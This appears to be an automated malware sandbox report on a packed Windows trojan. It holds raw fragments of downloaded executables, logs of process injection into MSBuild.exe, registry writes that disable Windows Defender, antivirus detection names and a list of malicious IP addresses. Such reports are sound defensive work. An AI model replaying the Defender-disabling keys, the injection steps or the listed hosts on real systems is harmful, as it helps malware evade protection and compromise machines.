Ñ@‹Àÿ%Ñ@‹Àÿ%(Ñ@‹Àÿ%Ñ@‹Àÿ%Ñ@‹Àÿ%üÐ@‹Àÿ%øÐ@‹Àÿ%ôÐ@‹Àÿ%ðÐ@‹Àÿ%ìÐ@‹Àÿ%èÐ@‹Àÿ%äÐ@‹Àÿ%àÐ@‹Àÿ%ÜÐ@‹Àÿ%ØÐ@‹Àÿ%ÔÐ@‹Àÿ%@Ñ@‹Àÿ%<Ñ@‹Àÿ%8Ñ@‹Àÿ%4Ñ@‹Àÿ%0Ñ@‹Àÿ%ÐÐ@‹Àÿ%ÌÐ@‹Àÿ%ÈÐ@‹Àÿ%ÄÐ@‹Àÿ%ÀÐ@‹Àÿ%¼Ð@‹Àÿ%¸Ð@‹Àÿ%´Ð@‹ÀSV¾8Ä@ƒ>u:hDjè¨ÿÿÿ‹È…Éu3À^[á4Ä@‰‰ 4Ä@3ҋÂÀDÁ‹‰‰Bƒúduì‹‹‰^[Љ‰@ËÀSV‹ò‹Øèÿÿÿ…Àu3À^[ˉP‹V‰P ‹‰‰X‰B‰°^[ËP‹‰ ‰Q‹8Ä@‰£8Ä@ÃSVWUQ‹ñ‰$‹è‹]‹$‹‰‹P‰V‹;‹C‹ÐS ;u‹Ãè·ÿÿÿ‹C‰‹C Fë‹V;Âu ‹Ãèšÿÿÿ‹C F‹ß;ëu‹֋ÅèUÿÿÿ„Àu3À‰Z]_^[Í@SVWUƒÄø‹Ø‹û‹2‹C;ðrl‹ÎJ‹èk ;Íw^;ðu‹BC‹B)C ƒ{ uD‹Ãè5ÿÿÿë;‹ ‹r΋ø{ ;Ïu)s ë&‹ J‰ $+ù
request_handle: 0x0000000000cc0070
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $j™ä.øs·.øs·.øs·e€p¶%øs·e€v¶îøs·e€t¶/øs·ìyŽ·*øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·e€w¶6øs·e€u¶/øs·e€r¶5øs·.ør·ùs·Ýzz¶2øs·ÝzŒ·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà '¼|DSÐ@ S@€8@IÔ`°(@I°8@IÀ< @à€Ð@ @àPPB @à  J @à À\ @à.rsrc`\ @àÐ/p` @à.dataThà @IÚ ` @à¤ÌÁ.ˆÜ$mo%Í:Ñý~*8Ñü(p[~H…™ ¸ì¦?áôšï¬ËQ™^¯imo´o`$½è¸°|-i *¹’M4#a¼:gS©TC "£ϗIi÷ð¹sçÐ6Fz§à…†îP@wl±¢KàÅ]¨Ë$°õ¾b\©§#z Žñ¦¢ªºCßòýÑ°¦à¢V¥µ=“¤‘ãRˆf¨îšu§ò“ݸˆy4וÚô2?£ŠCd¶§¼½<®ñl?2äô÷$[s [/ôra,¶TìN8”Ô•µx*¦ÌÜõ[M…‡aûšà†o/gESjÄaM²§žä¿tê]½{š˜@ŒÚ¾”Àk‚©¤7É (͝‚¨4Ìt ¬€ WaD‡Mc‡Rn–¹|ÖÀêê­í7H«§bØi´ )AtX¿ÉSÄ+]j#‚~°â…žc)òUYny ¹ ›Гþ>…ºç QõTˆ;ӛæÁ-3oz†HaA7wq‡h4´p(La–üÚS>Ì*1¿÷•æ5é2Ké¤ù4fxZÑλLŸÄ3yîªÌL30 Í%ú…•,[r:§QyÒñ üË玸þ)a—yÄyUc3O„ë€ç£2¾gÈå#b€Z;’dÙµWÆ íIùh)·‹?±Òñ“gSH°†Mj°“¾aÈÙ N;Á.žÒØn¡¢`#çžn_«̯&_Þ'Î#ŒÜÐ4|À¥S&€n"Á €f‰ÔÃš”ߟ¿ÜÐIeÝë遴#uvÓBª{·õï­ëԚ.v¼ã‘c¬È˥ʟ´É¯ümÍí…[RF«£Z¿t܀´'û†Õ’8ˆ÷[GT¯px­•áFPôem]{ú!¸ÀaÑÝQC¡̾Oä=–4ì÷¶* ¿¨reüÿ€åkiIY%ëq ÃÀ÷;šWú¶‘C{RKdÄ:}°ZAmœ™~þä‹‡÷.¶Ñ÷ýl‚Hp(St`…9%¢ýæé>½~ÄYxçÏz/Mæ‘ÃR¿1SƒÈú¹ÍY™CL¿Á<™S¨»i„qàäR «^“ ƒI¢Òûí5üª\ò66-côD¡ZäAÊBãêšÛŠ×¤=à—5ïºu{%Þ‹J×IÇõé>´|a#õÃ×ÃÍ®´0•`ŠSzž*)$ïLÎRh+ÿáL°ÅŸ¾«ˆ+¬Šçʒ ÎØö̐†!Ð!éPýÆÿé_Ö{m0…‘˜Ë-©{O5׶f»F]‘0,ÎÐPlÞ$l¤qW^:´ˆÑÉ©êóo6®*Ó¼È)4Þ)eÄF0ŸÕû
request_handle: 0x0000000000cc0088
1 1 0

InternetReadFile

 buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† â_3fð# €,Ê`‹ú@À¥ 06‘d¥X,Y¥ü*€ŠŒ(ÀW¥8°÷h.text¶~ `.rdatað@@.dataÈæÉ°@À.pdata€ Ê@@.00cfg°Ê@@.tlsÀÊ@À.text0ìÓ,ÐÊ `.text18°÷ @À.text2üíÀ÷Ä­`h.rsrcX,¥.Ò­@@Œ™‰Êj’jEf̺D _Žñ÷êý’0,’¶ Š
request_handle: 0x0000000000cc007c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL0%\fà  ‚HZ.¡H ÀH@ @K@…à HKÀH W K  H  H.text4H ‚H `.rsrc WÀHX„H@@.reloc KÜJ@B¡HHÄq |¨J@#E%V+(¬BRi( 8*B+(‰23<~þ*6+(÷žN_~*Z+( hb( 8*B+(6ÈO2~þ*6+( ÓI\~*0‡+(÷&O8þ EO@8Js €8s €8*s € 9¹ÿÿÿ&8¯ÿÿÿs €8Åÿÿÿs € :ÿÿÿ&8…ÿÿÿ0++(Æ `8 88~o! 8äÿÿÿ*0++(ÍÆlL8 88*~o" 8áÿÿÿ0++(IÅxP8 88*~o# 8áÿÿÿ0++(£B:8*~o$ 88æÿÿÿ8áÿÿÿ0++(ýM>8 88~o% 8äÿÿÿ*B+(AöU5~þ*6+(²¸G_~*0c+(188þ E8*{ (+} 88âÿÿÿ (9Åÿÿÿ& 8ºÿÿÿ{ 8Ôÿÿÿ0ž+(®y.8~þ E~8:/8 8h (:Íÿÿÿ& 8Âÿÿÿ88 (s& z| o+ (:Œÿÿÿ&8‚ÿÿÿ{ @Œÿÿÿ8“ÿÿÿ*0-+(0Œ9þo' 9ý~ 9:~ Ð(( o) 9 J( 1(* s+ z8 s, € ~ Ð(( o- (+ ݔ݀ui%:&8% (/ o0 þþþþ& †( 1 o0 o1 ¢ (* o0 s2 z(3 Ý~ Ð(( o4 Ü8 8*ŒÆ?œŒy0& +(jŽ].þo5 þ*Z+(Œ¸Y^(6 8*0( +("¿w[(7 (8 8*8øÿÿÿ8óÿÿÿ0'+(;¡D@8*(9 88êÿÿÿ8åÿÿÿ0+ +(Ï@3M8 *8øÿÿÿ8óÿÿÿÐ(( 8äÿÿÿ0'
request_handle: 0x0000000000cc0038
1 1 0
section {u'size_of_data': u'0x00315000', u'virtual_address': u'0x002a1000', u'entropy': 7.9346184576232, u'name': u'.vmpx\\xc2\\xbd\\xc2', u'virtual_size': u'0x00314e8c'} entropy 7.93461845762 description A section with a high entropy has been found
entropy 0.938587360595 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://www.winimage.com/zLibDll
description Communications over RAW Socket rule Network_TCP_Socket
description Take ScreenShot rule ScreenShot
description Steal credential rule local_credential_Steal
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
section .vmpx\xc2\xbd\xc2 description Section name indicates VMProtect
section .vmpx\xc2\xbd\xc2 description Section name indicates VMProtect
section .vmpx\xc2\xbd\xc2 description Section name indicates VMProtect
host 149.88.76.85
host 176.111.174.109
host 147.45.47.149
host 185.172.128.159
host 185.172.128.69
host 5.42.66.10
host 5.42.99.177
host 91.202.233.232
host 94.232.45.38
host 5.42.65.116
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2876
region_size: 1662976
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000264
1 0 0
registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules
wmi Select * From AntiVirusProduct
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $j™ä.øs·.øs·.øs·e€p¶%øs·e€v¶îøs·e€t¶/øs·ìyŽ·*øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·e€w¶6øs·e€u¶/øs·e€r¶5øs·.ør·ùs·Ýzz¶2øs·ÝzŒ·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà '¼|m=Ð@`@€8 8ÀX˜°8@X@ÐÜœ6@.textÈ»¼ `.rdata2~ЀÀ@@.data0IP2@@À.rsrc8 r@@.relocX˜ÀšŠ@B
base_address: 0x00400000
process_identifier: 2876
process_handle: 0x00000264
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 2876
process_handle: 0x00000264
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $j™ä.øs·.øs·.øs·e€p¶%øs·e€v¶îøs·e€t¶/øs·ìyŽ·*øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·e€w¶6øs·e€u¶/øs·e€r¶5øs·.ør·ùs·Ýzz¶2øs·ÝzŒ·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà '¼|m=Ð@`@€8 8ÀX˜°8@X@ÐÜœ6@.textÈ»¼ `.rdata2~ЀÀ@@.data0IP2@@À.rsrc8 r@@.relocX˜ÀšŠ@B
base_address: 0x00400000
process_identifier: 2876
process_handle: 0x00000264
1 1 0
Bkav W64.AIDetectMalware
Lionic Virus.Generic.AI.1!c
Elastic malicious (high confidence)
Skyhigh BehavesLike.Win64.Generic.wc
Cylance Unsafe
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win64/GenKryptik.GVXA
APEX Malicious
McAfeeD ti!2D8524C8B315
FireEye Generic.mg.9905d4c0f3aaf44c
Gridinsoft Trojan.Heur!.02210683
DeepInstinct MALICIOUS
SentinelOne Static AI - Suspicious PE
CrowdStrike win/malicious_confidence_100% (D)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Process injection Process 2816 called NtSetContextThread to modify thread in remote process 2876
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4406637
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000260
process_identifier: 2876
1 0 0
Process injection Process 2816 resumed a thread in remote process 2876
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000260
suspend_count: 1
process_identifier: 2876
1 0 0
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000000000003c0
suspend_count: 1
process_identifier: 2364
1 0 0

CreateProcessInternalW

 thread_identifier: 2820
thread_handle: 0x00000000000006b8
process_identifier: 2816
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\Documents\SimpleAdobe\o_CeSdAw1K73YQlvgMMzEXT2.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x0000000000000604
1 1 0

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2816
1 0 0

NtResumeThread

 thread_handle: 0x0000014c
suspend_count: 1
process_identifier: 2816
1 0 0

NtResumeThread

 thread_handle: 0x00000194
suspend_count: 1
process_identifier: 2816
1 0 0

NtResumeThread

 thread_handle: 0x00000218
suspend_count: 1
process_identifier: 2816
1 0 0

NtGetContextThread

 thread_handle: 0x000000e0
1 0 0

NtGetContextThread

 thread_handle: 0x000000e0
1 0 0

NtResumeThread

 thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2816
1 0 0

NtGetContextThread

 thread_handle: 0x000000e0
1 0 0

NtGetContextThread

 thread_handle: 0x000000e0
1 0 0

NtGetContextThread

 thread_handle: 0x000000e0
1 0 0

NtSetContextThread

 registers.eip: 1943939972
registers.esp: 3655520
registers.edi: 3655604
registers.eax: 2135121321
registers.ebp: 3655560
registers.edx: 13
registers.ebx: 44865660
registers.esi: 4
registers.ecx: 45583636
thread_handle: 0x000000e0
process_identifier: 2816
1 0 0

NtResumeThread

 thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2816
1 0 0

CreateProcessInternalW

 thread_identifier: 2880
thread_handle: 0x00000260
process_identifier: 2876
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000264
1 1 0

NtGetContextThread

 thread_handle: 0x00000260
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2876
region_size: 1662976
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000264
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $j™ä.øs·.øs·.øs·e€p¶%øs·e€v¶îøs·e€t¶/øs·ìyŽ·*øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·e€w¶6øs·e€u¶/øs·e€r¶5øs·.ør·ùs·Ýzz¶2øs·ÝzŒ·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà '¼|m=Ð@`@€8 8ÀX˜°8@X@ÐÜœ6@.textÈ»¼ `.rdata2~ЀÀ@@.data0IP2@@À.rsrc8 r@@.relocX˜ÀšŠ@B
base_address: 0x00400000
process_identifier: 2876
process_handle: 0x00000264
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 2876
process_handle: 0x00000264
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0055d000
process_identifier: 2876
process_handle: 0x00000264
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00585000
process_identifier: 2876
process_handle: 0x00000264
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0058a000
process_identifier: 2876
process_handle: 0x00000264
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0058c000
process_identifier: 2876
process_handle: 0x00000264
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 2876
process_handle: 0x00000264
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4406637
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000260
process_identifier: 2876
1 0 0

NtResumeThread

 thread_handle: 0x00000260
suspend_count: 1
process_identifier: 2876
1 0 0
dead_host 5.42.65.116:50500
dead_host 147.45.47.149:80
dead_host 192.168.56.103:49178